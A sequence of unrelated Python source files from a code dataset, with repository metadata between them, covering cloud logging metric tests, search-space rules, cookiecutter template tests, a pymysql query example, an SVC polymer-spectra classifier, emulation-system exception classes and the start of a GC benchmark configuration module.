metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client1,
description=self.DESCRIPTION)
metric.update(client=client2)
self.assertEqual(
api._metric_update_called_with,
(self.PROJECT, self.METRIC_NAME, self.FILTER, self.DESCRIPTION))
def test_delete_w_bound_client(self):
client = _Client(project=self.PROJECT)
api = client.metrics_api = _DummyMetricsAPI()
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client)
metric.delete()
self.assertEqual(api._metric_delete_called_with,
(self.PROJECT, self.METRIC_NAME))
def test_delete_w_alternate_client(self):
client1 = _Client(project=self.PROJECT)
client2 = _Client(project=self.PROJECT)
api = client2.metrics_api = _DummyMetricsAPI()
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client1)
metric.delete(client=client2)
self.assertEqual(api._metric_delete_called_with,
(self.PROJECT, self.METRIC_NAME))
class _Client(object):
def __init__(self, project):
self.project = project
class _DummyMetricsAPI(object):
def metric_create(self, project, metric_name, filter_, description):
self._metric_create_called_with = (
project, metric_name, filter_, description)
def metric_get(self, project, metric_name):
from google.cloud.exceptions import NotFound
self._metric_get_called_with = (project, metric_name)
try:
return self._metric_get_response
except AttributeError:
raise NotFound('miss')
def metric_update(self, project, metric_name, filter_, description):
self._metric_update_called_with = (
project, metric_name, filter_, description)
def metric_delete(self, project, metric_name):
self._metric_delete_called_with = (project, metric_name)
| 38.388889
| 77
| 0.658569
|
7dac23a2213d1fa709753bc3c927ab486417fce3
| 1,623
|
py
|
Python
|
mosaic/simulation/rules.py
|
JohnKurian/mosaic
|
bc985640844e10b9aded478d6ef7a5f286ab2d82
|
[
"BSD-3-Clause"
] | 6
|
2018-09-17T13:27:46.000Z
|
2021-09-03T15:46:15.000Z
|
mosaic/simulation/rules.py
|
JohnKurian/mosaic
|
bc985640844e10b9aded478d6ef7a5f286ab2d82
|
[
"BSD-3-Clause"
] | null | null | null |
mosaic/simulation/rules.py
|
JohnKurian/mosaic
|
bc985640844e10b9aded478d6ef7a5f286ab2d82
|
[
"BSD-3-Clause"
] | 2
|
2019-11-21T13:17:11.000Z
|
2020-11-30T03:32:41.000Z
|
class BaseRule():
def __init__(self, applied_to = []):
self.applied_to = applied_to
def test(self, list_nodes = []):
        raise NotImplementedError()
class DependanceRule(BaseRule):
def __init__(self, applied_to = [], parent = None):
super(DependanceRule, self).__init__(applied_to=applied_to)
self.parent = parent
def test(self):
        raise NotImplementedError()
class ChildRule(BaseRule):
def __init__(self, applied_to = [], parent = None, value = []):
super().__init__(applied_to = applied_to)
self.parent = parent
self.value = value
def test(self, list_nodes = []):
parent_value = None
has_node = [False] * len(self.applied_to)
for node_name, v in list_nodes:
if node_name == self.parent:
parent_value = v
if node_name in self.applied_to:
index = self.applied_to.index(node_name)
has_node[index] = True
return False if (parent_value not in self.value) and (True in has_node) else True
class ValueRule(BaseRule):
def __init__(self, constraints = []):
super().__init__(applied_to = [])
for c, v in constraints:
self.applied_to.append(c)
self.constraints = constraints
def test(self, list_nodes = []):
has_node = []
for node_name, v in list_nodes:
if node_name in self.applied_to:
index = self.applied_to.index(node_name)
has_node.append((self.constraints[index][1] == v))
return not (True in has_node and False in has_node)
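# Illustrative usage (hypothetical parameter names): a ChildRule stating that
# "kernel" may only appear when its parent "algorithm" takes the value "svm":
#
#   rule = ChildRule(applied_to=["kernel"], parent="algorithm", value=["svm"])
#   rule.test([("algorithm", "svm"), ("kernel", "rbf")])   # True
#   rule.test([("algorithm", "knn"), ("kernel", "rbf")])   # False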
| 30.622642
| 89
| 0.60382
|
5a52341673c0bafe099d95b4e2f74733a21001f7
| 3,164
|
py
|
Python
|
tests/test_creation.py
|
TobiasSkovgaardJepsen/cookiecutter-data-science-research
|
6505e7d379c56184d55351d9f3610269a6b31ae6
|
[
"MIT"
] | null | null | null |
tests/test_creation.py
|
TobiasSkovgaardJepsen/cookiecutter-data-science-research
|
6505e7d379c56184d55351d9f3610269a6b31ae6
|
[
"MIT"
] | 11
|
2018-09-18T08:05:20.000Z
|
2018-11-15T12:31:57.000Z
|
tests/test_creation.py
|
TobiasSkovgaardJepsen/cookiecutter-data-science-research
|
6505e7d379c56184d55351d9f3610269a6b31ae6
|
[
"MIT"
] | null | null | null |
import os
import pytest
from subprocess import check_output
from conftest import system_check
def no_curlies(filepath):
""" Utility to make sure no curly braces appear in a file.
    That is, was jinja able to render everything?
"""
with open(filepath, 'r') as f:
data = f.read()
template_strings = [
'{{',
'}}',
'{%',
'%}'
]
template_strings_in_file = [s in data for s in template_strings]
return not any(template_strings_in_file)
@pytest.mark.usefixtures("default_baked_project")
class TestCookieSetup(object):
def test_project_name(self):
project = self.path
if pytest.param.get('project_name'):
name = system_check('DrivenData')
assert project.name == name
else:
assert project.name == 'project_name'
def test_author(self):
setup_ = self.path / 'setup.py'
args = ['python', setup_, '--author']
p = check_output(args).decode('ascii').strip()
if pytest.param.get('author_name'):
assert p == 'DrivenData'
else:
assert p == 'Your name (or your organization/company/team)'
def test_readme(self):
readme_path = self.path / 'README.md'
assert readme_path.exists()
assert no_curlies(readme_path)
if pytest.param.get('project_name'):
with open(readme_path) as fin:
assert 'DrivenData' == next(fin).strip()
def test_setup(self):
setup_ = self.path / 'setup.py'
args = ['python', setup_, '--version']
p = check_output(args).decode('ascii').strip()
assert p == '0.1.0'
def test_license(self):
license_path = self.path / 'LICENSE'
assert license_path.exists()
assert no_curlies(license_path)
def test_license_type(self):
setup_ = self.path / 'setup.py'
args = ['python', setup_, '--license']
p = check_output(args).decode('ascii').strip()
if pytest.param.get('open_source_license'):
assert p == 'BSD-3'
else:
assert p == 'MIT'
def test_requirements(self):
reqs_path = self.path / 'Pipfile'
assert reqs_path.exists()
assert no_curlies(reqs_path)
def test_makefile(self):
makefile_path = self.path / 'Makefile'
assert makefile_path.exists()
assert no_curlies(makefile_path)
def test_folders(self):
expected_dirs = [
'data',
'data/external',
'data/interim',
'data/processed',
'data/raw',
'reference_material',
'models',
'notebooks',
'reports',
'reports/figures',
'src',
'src/data',
'src/features',
'src/models',
'src/visualization',
]
ignored_dirs = [
str(self.path)
]
abs_expected_dirs = [str(self.path / d) for d in expected_dirs]
abs_dirs, _, _ = list(zip(*os.walk(self.path)))
assert len(set(abs_expected_dirs + ignored_dirs) - set(abs_dirs)) == 0
| 29.027523
| 78
| 0.564159
|
7bf6e7a308f937e7eb401f28fae9ffaca6bb2088
| 764
|
py
|
Python
|
python全栈/day40/day40-1pymysql的查询语句操作.py
|
Ringo-li/python_exercise_100
|
2c6c42b84a88ffbbac30c67ffbd7bad3418eda14
|
[
"MIT"
] | null | null | null |
python全栈/day40/day40-1pymysql的查询语句操作.py
|
Ringo-li/python_exercise_100
|
2c6c42b84a88ffbbac30c67ffbd7bad3418eda14
|
[
"MIT"
] | null | null | null |
python全栈/day40/day40-1pymysql的查询语句操作.py
|
Ringo-li/python_exercise_100
|
2c6c42b84a88ffbbac30c67ffbd7bad3418eda14
|
[
"MIT"
] | null | null | null |
# 1. Import the package
import pymysql
if __name__ == "__main__":
    # 2. Create the connection object
conn = pymysql.connect(host="192.168.33.13",
port = 3306,
user = 'root',
password = 'mysql',
database = 'students',
charset = "utf8")
    # 3. Get a cursor, used to execute SQL statements
cursor = conn.cursor()
    # 4. Execute the SQL statement
    # 4.1 Prepare the SQL statement
sql = "select * from students;"
    # 4.2 Execute the SQL statement
cursor.execute(sql)
    # 4.3 Fetch the first query result (a tuple)
# row = cursor.fetchone()
# print(row)
    # 4.4 Fetch all results (a tuple of tuples)
result = cursor.fetchall()
# print(result)
for row in result:
print(row)
    # 5. Close the cursor
cursor.close()
    # 6. Close the connection
conn.close()
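    # Note (illustrative): for queries built from user input, prefer
    # parameterized execution so pymysql escapes the values itself, e.g.:
    #   cursor.execute("select * from students where id = %s", (1,))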
| 21.222222
| 51
| 0.477749
|
2f264c2a13cb62173a4cd3b38e58cfa6f208e893
| 5,942
|
py
|
Python
|
evaluate_new-sample.py
|
edsonjunior14/mp_classification
|
dafbec182afc6e787911ec9cf0948a472477c368
|
[
"MIT"
] | 5
|
2021-08-31T17:45:04.000Z
|
2022-01-14T18:40:08.000Z
|
evaluate_new-sample.py
|
edsonjunior14/mp_classification
|
dafbec182afc6e787911ec9cf0948a472477c368
|
[
"MIT"
] | null | null | null |
evaluate_new-sample.py
|
edsonjunior14/mp_classification
|
dafbec182afc6e787911ec9cf0948a472477c368
|
[
"MIT"
] | 3
|
2021-09-15T09:13:46.000Z
|
2022-03-09T09:17:28.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 13 19:55:56 2021
@author: scien
"""
#Standard packages
import os
import numpy as np
import pandas as pd
#Graphics packages
from matplotlib import pyplot as plt
#ML modules
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from imblearn.over_sampling import RandomOverSampler
from sklearn.metrics import accuracy_score
from sklearn.metrics import log_loss
from sklearn.base import clone
from sklearn.svm import SVC
#Project packages
from utils import build_row
from baseline import als
import config
mccv_path = config._get_path( 'mccv')
seed = config._seed()
def results_total(X, name, sufix):
filepath = os.path.join(mccv_path + '_newsample',
name, sufix + '.csv')
pd.DataFrame(data = X, columns= ['Cross_Entropy_train',
'Cross_Entropy_val',
'Accuracy_train',
'Accuracy_val']).to_csv(filepath,index=False)
def results(X, name, sufix):
filepath = os.path.join(mccv_path + '_newsample', name,
sufix + '.csv')
pd.DataFrame(data = X).to_csv(filepath, header=False, index=False)
path = os.path.join('data','new_sample.csv')
df = pd.read_csv(path,decimal=r',')
df.drop(columns=['Spectrum ID'], inplace=True)
y = df['Polymer'].copy()
X = df.drop(columns=['Polymer'])
freq = df['Polymer'].value_counts()
print('Previous class frequency:')
print(freq)
threshold = 10
less_rep = [idx for idx, value in freq.items() if value < threshold]
for i, row in df.iterrows():
if row['Polymer'] in less_rep:
df.at[i, 'Polymer'] = 'Unknown'
print('\n \n \n New class frequency (after removing Unknown):')
print(df['Polymer'].value_counts())
encoder = LabelEncoder()
y = encoder.fit_transform(df['Polymer'])
print("Running preprocessing...")
for idx, row in X.iterrows():
X.iloc[idx, :] = row - als(row)
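# Baseline correction: each spectrum has its als() fit (asymmetric least
# squares smoothing, from the local baseline module) subtracted point-wise.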
base_model = SVC(kernel = 'linear', C = 100,
probability = True, random_state= seed)
n_class = np.unique(y).shape[0]
total_score = []
probability = [] #flattened
cross_matrix = [] #flattened
detailed_score = [] #flattened
name = 'baseline_SVC_linear_100.0'
for i in range(0, 1700):
X_train, X_val, y_train, y_val = train_test_split(X,
y,
stratify=y,
test_size= 1/3)
ros = RandomOverSampler()
X_train, y_train = ros.fit_resample(X_train, y_train)
model = clone(base_model)
model.fit(X_train, y_train)
predict_array = model.predict(X_val)
predicted_prob = model.predict_proba(X_val)
total_score.append([log_loss(y_train, model.predict_proba(X_train)),
log_loss(y_val, predicted_prob),
accuracy_score(np.array(y_train), model.predict(X_train)),
accuracy_score(np.array(y_val), predict_array)
])
flatten_probabilities = []
flatten_cross = []
for j in range(n_class):
idxs = np.where(y_val == j)[0] #idxs of true j-label
flatten_probabilities.extend(np.mean(predicted_prob[idxs], axis = 0))
flatten_cross_by_class = [len(np.where(predict_array[idxs] == k)[0])
for k in range(n_class) ]
flatten_cross.extend(flatten_cross_by_class)
cross_matrix.append(flatten_cross)
probability.append(flatten_probabilities)
detailed_score.append(build_row(X_val, y_val, predict_array))
results_total(total_score, name, 'total_score')
results(cross_matrix, name, 'cross_matrix')
results(probability, name, 'probability')
results(detailed_score, name, 'detailed_score')
names = encoder.inverse_transform([i for i in range(n_class)])
import seaborn as sns
graphics_path = config._get_path('graphics')
def cross_heatmap(df, name):
w = df.mean(axis=0).values.reshape(n_class, n_class) #ndarray
for i in range(n_class):
w[i] /= np.sum(w[i])
w = np.around(w, decimals=3)
cross_frame = pd.DataFrame(data = w, columns = names, index = names)
fig, ax = plt.subplots(figsize=(12, 7))
sns.heatmap(cross_frame, annot=True, linewidths= 1, cmap="YlGnBu", ax = ax)
ax.set_title('True class v.s. Predicted Class (mean)')
fig.savefig(os.path.join(graphics_path, name + '_cross_prediction.png'),
dpi = 1200,
bbox_inches = "tight")
def detailed_score_heatmap(df, name):
w = df.mean(axis=0).values.reshape(n_class, 4)
w = np.around(w, decimals=3)
score_frame = pd.DataFrame(data = w,
columns=['sensitivity', 'specificity',
'precision', 'f1_score'],
index = names)
fig, ax = plt.subplots(figsize=(7, 7))
#color_map = plt.get_cmap('YlGnBu_r')
#color_map = ListedColormap(color_map(np.linspace(0.1, 0.6, 256)))
sns.heatmap(score_frame,
annot=True, linewidths= 0.05, cmap='YlGnBu', ax = ax)
ax.set_title(name + ' Scores')
fig.savefig(os.path.join(graphics_path, name + '_detailed_score.png'),
dpi = 1200,
bbox_inches = "tight")
"""
def plot_sample(sample):
horizontal = [int(x.split('.')[0]) for x in sample.columns.values]
values = sample.values[0]
plt.xlabel("Wavelenght (1/cm)")
plt.plot(horizontal, values, color = config._blue, label = 'sample')
plt.plot(horizontal, values - als(values),
color = config._purple, label= 'sample (corrected)')
plt.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.show()
plot_sample(X.sample(n=1))
"""
| 28.985366
| 79
| 0.610401
|
7f0833abf1d427faf9adfed4404f5d616cae8b17
| 4,065
|
py
|
Python
|
emulation_system/emulation_system/compose_file_creator/errors.py
|
Opentrons/opentrons-emulation
|
aee3b362ef47190b35a1a99d040f5d87800e740b
|
[
"Apache-2.0"
] | 3
|
2022-02-15T23:58:01.000Z
|
2022-03-17T19:32:15.000Z
|
emulation_system/emulation_system/compose_file_creator/errors.py
|
Opentrons/opentrons-emulation
|
aee3b362ef47190b35a1a99d040f5d87800e740b
|
[
"Apache-2.0"
] | 23
|
2021-11-17T17:55:22.000Z
|
2022-03-29T19:15:20.000Z
|
emulation_system/emulation_system/compose_file_creator/errors.py
|
Opentrons/opentrons-emulation
|
aee3b362ef47190b35a1a99d040f5d87800e740b
|
[
"Apache-2.0"
] | null | null | null |
"""One-stop shop for all errors."""
from typing import List, Set
from emulation_system.compose_file_creator.settings.config_file_settings import Hardware
class MountError(Exception):
"""Base mount exception."""
...
class NoMountsDefinedError(MountError):
"""Exception thrown when you try to load a mount and none are defined."""
def __init__(self) -> None:
super().__init__("You have no mounts defined.")
class MountNotFoundError(MountError):
"""Exception thrown when mount of a certain name is not found."""
def __init__(self, name: str) -> None:
super().__init__(f'Mount named "{name}" not found.')
class EmulationLevelNotSupportedError(Exception):
"""Exception thrown when emulation level is not supported."""
def __init__(self, emulation_level: str, hardware: str) -> None:
super().__init__(
f'Emulation level, "{emulation_level}" not supported for "{hardware}"'
)
class LocalSourceDoesNotExistError(Exception):
"""Exception thrown when local source-location does not exist."""
def __init__(self, path: str) -> None:
super().__init__(f'"{path}" is not a valid directory path')
class InvalidRemoteSourceError(Exception):
"""Exception thrown when remote source is not valid."""
def __init__(self, value: str) -> None:
super().__init__(
f'"{value}" is not valid. Must either be a valid commit sha, or the '
f'value "latest"'
)
class DuplicateHardwareNameError(Exception):
"""Exception thrown when there is hardware with duplicate names."""
def __init__(self, duplicate_names: Set[str]) -> None:
super().__init__(
"The following container names are duplicated in the configuration file: "
f"{', '.join(duplicate_names)}"
)
class ImageNotDefinedError(Exception):
"""Exception thrown when there is no image defined for specified emulation level/source type.""" # noqa: E501
def __init__(self, emulation_level: str, source_type: str, hardware: str) -> None:
super().__init__(
f'Image with emulation level of "{emulation_level}" and source type '
f'"{source_type}" does not exist for {hardware}'
)
class IncorrectHardwareError(Exception):
"""Exception thrown when incorrect hardware is specified."""
    def __init__(
        self, specified_hardware: Hardware, expected_hardware: Hardware
    ) -> None:
        super().__init__(
            f"Incorrect hardware specified: {specified_hardware}. "
            f"Expected: {expected_hardware}"
        )
class HardwareDoesNotExistError(Exception):
"""Exception thrown when hardware does not exist."""
def __init__(self, specified_hardware: Hardware) -> None:
super().__init__(f"{specified_hardware} not defined.")
class RepoDoesNotExistError(Exception):
"""Exception thrown when repo does not exist."""
def __init__(self, repo_name: str) -> None:
super().__init__(f'Repo "{repo_name}" does not exist.')
class ServiceDoesNotExistError(Exception):
"""Exception thrown when Robot Server does not exist."""
def __init__(self, service_name: str) -> None:
super().__init__(
f"You do not have a {service_name} in your generated configuration."
)
class NotRemoteOnlyError(Exception):
"""Exception thrown when not any robot or module is not of remote source-type."""
def __init__(self) -> None:
super().__init__(
'Not all source-type parameters for passed system are "remote".'
)
class InvalidFilterError(Exception):
"""Exception thrown when Robot Server does not exist."""
def __init__(self, filter_name: str, valid_filters: List[str]) -> None:
valid_names = "\n\t".join(valid_filters)
valid_not_names = "\n\tnot-".join(valid_filters)
super().__init__(
f'\n\nFilter name "{filter_name}" is invalid.\n'
f"Valid filter names are \n\t{valid_names}\n\n\tnot-{valid_not_names}\n"
)
| 31.757813
| 114
| 0.664207
|
5e7d3cac92a1a0f1bb8d7e3cd2e7224b16a485de
| 13,741
|
py
|
Python
|
bip39validator/__main__.py
|
ZenulAbidin/bip39validator
|
b78f2db6f46b56b408eef3a51e921e96247a9b46
|
[
"MIT"
] | 3
|
2021-02-11T20:37:56.000Z
|
2021-06-11T03:29:15.000Z
|
bip39validator/__main__.py
|
ZenulAbidin/bip39validator
|
b78f2db6f46b56b408eef3a51e921e96247a9b46
|
[
"MIT"
] | 4
|
2020-10-04T23:11:08.000Z
|
2020-12-23T00:32:52.000Z
|
bip39validator/__main__.py
|
ZenulAbidin/bip39validator
|
b78f2db6f46b56b408eef3a51e921e96247a9b46
|
[
"MIT"
] | null | null | null |
# BIP39 Wordlist Validator - A tool to validate BIP39 wordlists in Latin
# languages.
# __main__.py: Main program
# Copyright 2020 Ali Sherief
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import argparse
import pdb
import validators
from os.path import abspath
from bip39validator.InvalidWordList import InvalidWordList
from bip39validator.ValidationFailed import ValidationFailed
from bip39validator.BIP39WordList import BIP39WordList
from bip39validator.internal.logging import setargs, progressbar, logerror, loginfo, \
logdefault, separator, logwarning
from bip39validator.__version__ import __version__
default_lev = 2
default_init_uniq = 4
default_max_length = 8
def version_str():
return """BIP39 Validator {}
Copyright (C) 2020 Ali Sherief
License: MIT License <https://opensource.org/licenses/MIT>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Written by Ali Sherief.""".format(__version__)
def abort(debug):
if log_file:
log_file.close()
if debug:
logerror("Debug mode on, entering pdb")
pdb.set_trace()
exit(1)
else:
logerror("Aborting")
exit(1)
def check_validity_warnings(validity):
if not validity.is_sorted:
logwarning('Wordlist is not sorted. It is recommended to sort the wordlist \
before publishing it.')
if not validity.has_2048_words:
logwarning('Wordlist has {} words. Exactly 2048 words are needed to map \
each word to an 11-bit value 1-to-1.'.format(validity.num_words))
def handle_invalid_wordlist(args, e):
if args.nosane:
return
check_validity_warnings(e)
for l in e.err_lines:
logerror("Word \"{}\" (line{}) has a non-lowercase character\
or is blank (Did you remove whitespace and empty lines?)".format(l.word, l.line))
logerror("Valid characters test failed")
logerror("Cannot perform additional tests")
abort(args.debug)
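# For reference (not this package's internal API): the distance the test
# enforces is the classic Levenshtein edit distance, computable with the
# standard dynamic program, e.g.:
#
# def levenshtein(a, b):
#     prev = list(range(len(b) + 1))
#     for i, ca in enumerate(a, 1):
#         cur = [i]
#         for j, cb in enumerate(b, 1):
#             cur.append(min(prev[j] + 1,                  # deletion
#                            cur[j - 1] + 1,               # insertion
#                            prev[j - 1] + (ca != cb)))    # substitution
#         prev = cur
#     return prev[-1]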
log_file = None
args = None
def main():
log_file = None
try:
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,
description='BIP39 wordlist validator')
parser.add_argument('input', type=str, help='path to the input file')
parser.add_argument('-d', '--min-levenshtein-distance', dest='lev_dist',
default=default_lev, type=int, help='set the minimum required \
Levenshtein distance between words (default: {})'.format(default_lev))
parser.add_argument('-u', '--max-initial-unique', dest='init_uniq',
default=default_init_uniq, type=int, help='set the maximum \
required unique initial characters between words (default: {})'.format(
default_init_uniq))
parser.add_argument('-l', '--max-length', dest='max_length',
default=default_max_length, type=int, help='set the maximum length of \
each word (default: {})'.format(default_max_length))
parser.add_argument('-D', '--no-levenshtein-distance', dest='no_lev_dist',
help='do not run the Levenshtein distance test', action='store_true')
parser.add_argument('-U', '--no-initial-unique', dest='no_init_uniq',
help='do not run the unique initial characters test',
action='store_true')
parser.add_argument('-L', '--no-max-length', dest='no_max_length',
help='do not run the maximum length test', action='store_true')
parser.add_argument('-o', '--output-file', type=str, dest='output',
help='logs all console output to an additional file')
parser.add_argument('-a', '--ascii', dest='ascii',
help='turn off rich text formatting and progress bars for console \
output', action='store_true')
parser.add_argument('-q', '--quiet', dest='quiet',
help='do not display details of test failures, only whether they \
succeeded or failed', action='store_true')
parser.add_argument('--nosane', dest='nosane', action='store_true',
help='Suppress wordlist sanity check. This might cause other tests to fail.')
parser.add_argument('--debug', dest='debug', action='store_true',
help='turn on debugging mode (intended for developers)')
parser.add_argument('--pycharm-debug', dest='pycharm_debug', action='store_true',
help='re-raise exceptions out of main() to Pycharm (intended for developers)')
parser.add_argument('-v', '--version', action='version',
version=version_str())
args = parser.parse_args()
# If there is an output file, then attempt to open it.
if args.output:
try:
absout = abspath(args.output)
# Set the ascii flag if desired before printing this
setargs(None, args)
logdefault("Attempting to open log file {} for writing".format(absout))
log_file = open(absout, 'w')
setargs(log_file, args)
except OSError as e:
logerror("open {} for writing failed: {}".format(e.filename,
e.strerror))
abort(args.debug)
else:
setargs(None, args)
# Now validate the parameters
if args.lev_dist <= 0:
logerror("Invalid value for --min-levenshtein-distance {}".format(
args.lev_dist))
abort(args.debug)
if args.init_uniq <= 0:
logerror("Invalid value for --min-initial-unique {}".format(
args.init_uniq))
abort(args.debug)
if args.max_length <= 0:
logerror("Invalid value for --max-length {}".format(
args.max_length))
abort(args.debug)
try:
valid_url = validators.url(args.input)
if valid_url:
kwargs = {'url': args.input}
logdefault("Reading wordlist URL {}".format(args.input))
else:
f = open(args.input)
kwargs = {'handle': f}
logdefault("Reading wordlist file {}".format(args.input))
try:
bip39 = BIP39WordList(desc=f"{args.input}", **kwargs)
loginfo("{} words read".format(len(bip39)))
except InvalidWordList as e:
handle_invalid_wordlist(args, e)
if not valid_url:
f.close()
except OSError as e:
logerror("Cannot read {}: {}".format(e.filename,
e.strerror))
abort(args.debug)
tally = 0
total = 4 - int(args.no_lev_dist) - int(args.no_init_uniq)\
- int(args.no_max_length)
logdefault("Checking wordlist for invalid characters")
try:
tup = bip39._test_lowercase_1()
kwargs = tup[3]
kwargs = progressbar('Looking for invalid characters', tup[0],
tup[1], tup[2], **kwargs)
validity = bip39._test_lowercase_2(kwargs)
check_validity_warnings(validity)
tally += 1
loginfo("Valid characters test succeeded")
except InvalidWordList as e:
handle_invalid_wordlist(args, e)
if args.nosane:
logwarning("Valid characters test failed, but --nosane passed; ignoring error")
logdefault("Finished checking wordlist for invalid characters")
separator()
if not args.no_lev_dist:
logdefault("Performing Levenshtein distance test")
try:
tup = bip39._test_lev_distance_1(n=args.lev_dist)
kwargs = tup[3]
kwargs = progressbar('Computing Levenshtein distance', tup[0],
tup[1], tup[2], **kwargs)
bip39._test_lev_distance_2(kwargs)
loginfo("No word pairs with Levenshtein distance less than {}" \
.format(args.lev_dist))
tally += 1
loginfo("Levenshtein distance test succeeded")
except ValidationFailed as e:
lev_dist = e.status_obj
word_pairs = lev_dist.getwordpairs_lt()
logerror("{} word pairs with Levenshtein distance less than {}\n" \
.format(len(word_pairs), args.lev_dist))
for i in range(1, args.lev_dist):
words_list = [*zip(lev_dist.getwordpairs_eq(i), lev_dist.getlinepairs_eq(i))]
logerror("{} word pairs with Levenshtein distance *equal* to {}:" \
.format(len(words_list), i))
for words, lines in words_list:
logerror(" \"{}\" (line {}) <--> \"{}\" (line {})" \
.format(words[0], lines[0], words[1], lines[1]))
logerror("")
logerror("{} total words below minimum Levenshtein distance".format(len(
word_pairs)))
logerror("Levenshtein distance test failed")
logdefault("Finished performing Levenshtein distance test")
separator()
if not args.no_init_uniq:
logdefault("Performing unique initial characters test")
try:
tup = bip39._test_initial_chars_1(n=args.init_uniq)
kwargs = tup[3]
kwargs = progressbar('Checking initial characters', tup[0],
tup[1], tup[2], **kwargs)
bip39._test_initial_chars_2(kwargs)
loginfo("All words are unique to {} initial characters".format(args.init_uniq))
tally += 1
loginfo("Unique initial characters test succeeded")
except ValidationFailed as e:
similar = e.status_obj
# Filter out groups with just one word in them as those are unique
groups = similar.groups_length(args.init_uniq)
logerror("{} groups of similar words (by {} initial characters)\n" \
.format(len(groups.items()), args.init_uniq))
for pre, group in groups.items():
logerror("Similar words with prefix \"{}\":".format(pre))
for wordline in group:
logerror(" \"{}\" (line {})".format(wordline[0], wordline[1]))
logerror("")
logerror("{} total similar words".format(len(groups.keys())))
logerror("Unique initial characters test failed")
logdefault("Finished unique initial characters test")
separator()
if not args.no_max_length:
logdefault("Performing maximum word length test")
try:
tup = bip39._test_max_length_1(n=args.max_length)
kwargs = tup[3]
kwargs = progressbar('Checking length', tup[0],
tup[1], tup[2], **kwargs)
bip39._test_max_length_2(kwargs)
loginfo("Length of all words are {} chracters or less".format(args.max_length))
tally += 1
loginfo("Maximum word length test succeeded")
except ValidationFailed as e:
lengths = e.status_obj
words = lengths.getwords_gt(args.max_length)
lines = lengths.getlines_gt(args.max_length)
logerror("Words longer than {} characters:".format(args.max_length))
for word, line in [*zip(words, lines)]:
logerror(" \"{}\" (line {})".format(word, line))
logerror("{} words longer than {} characters".format(len(lengths),
args.max_length))
logerror("Maximum word length test failed")
logdefault("Finished maximum word length test")
separator()
logdefault("{} of {} checks passed".format(tally, total))
if log_file:
log_file.close()
exit(0)
except Exception as e:
print("Got unknown exception {}: {}".format(type(e), str(e)))
if args.pycharm_debug:
raise e
else:
abort(args.debug)
if __name__ == "__main__":
main()
| 46.265993
| 106
| 0.582345
|
337818a37dd469363db2a54f88cfa5b3a3c50d1b
| 44,815
|
py
|
Python
|
src/benchmarks/gc/src/commonlib/bench_file.py
|
yuchong-pan/performance
|
be6e084cd07598c9276baecf6abb91d0d78e734c
|
[
"MIT"
] | null | null | null |
src/benchmarks/gc/src/commonlib/bench_file.py
|
yuchong-pan/performance
|
be6e084cd07598c9276baecf6abb91d0d78e734c
|
[
"MIT"
] | null | null | null |
src/benchmarks/gc/src/commonlib/bench_file.py
|
yuchong-pan/performance
|
be6e084cd07598c9276baecf6abb91d0d78e734c
|
[
"MIT"
] | null | null | null |
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the MIT license.
# See the LICENSE file in the project root for more information.
"""
A 'foo.yaml' file stores a specification of the tests to run.
These may be generated by the `generate` command of `run_tests.py`, see documentation there.
"""
from dataclasses import dataclass, fields
from enum import Enum
from pathlib import Path
from platform import machine as platform_machine
from typing import cast, Iterable, Mapping, Optional, Sequence, Tuple, Type, Union
from overrides import overrides
from .collection_util import (
combine_mappings,
empty_mapping,
filter_not_none,
find_only_or_only_matching,
is_empty,
optional_mapping,
)
from .option import map_option, non_null, optional_to_iter, option_or, option_or_3
from .parse_and_serialize import HexInt, load_yaml, SerializeMappings, write_yaml_file
from .score_spec import ScoreSpec
from .type_utils import (
combine_dataclasses_with_optional_fields,
doc_field,
get_field_info_from_name,
OrderedEnum,
with_slots,
)
from .util import (
add_extension,
assert_is_percent,
get_existing_absolute_file_path,
get_hostname,
get_os,
hex_no_0x,
OS,
remove_str_start,
try_remove_str_end,
try_remove_str_start,
)
@with_slots
@dataclass(frozen=True)
class GCPerfSimResult:
"""See `PrintResult` in GCPerfSim.cs"""
seconds_taken: float
num_created_with_finalizers: int
num_finalized: int
final_total_memory_bytes: int
# Indexed by generation (0-2)
collection_counts: Tuple[int, int, int]
# missing on older .NET versions
final_heap_size_bytes: Optional[int] = None
final_fragmentation_bytes: Optional[int] = None
@doc_field("memory_mb", "Size of the container in mebibytes.")
@doc_field("cpu_rate_hard_cap", "This allows fractional amounts, e.g. 2.5.")
@doc_field("image_name", "Not yet implemented. This would be the name of a docker container.")
@with_slots
@dataclass(frozen=True)
class TestConfigContainer:
"""
Options for running the test in a container.
A container is a cgroup, or a job object on windows.
Docker containers are not yet implemented.
"""
memory_mb: Optional[float] = None
cpu_rate_hard_cap: Optional[float] = None
image_name: Optional[str] = None
def __post_init__(self) -> None:
mb = self.memory_mb
if mb is not None:
assert 1 <= mb <= 100000
cpu = self.cpu_rate_hard_cap
if cpu is not None:
assert 0 < cpu <= 1
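# Illustrative bench-file fragment (hypothetical values) exercising this
# container section; memory_mb must lie in [1, 100000] and cpu_rate_hard_cap
# in (0, 1] per the assertions above:
#
#   container:
#     memory_mb: 1024
#     cpu_rate_hard_cap: 0.5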
@doc_field(
"percent",
"The memory load process will allocate memory until the system's memory load is this high.",
)
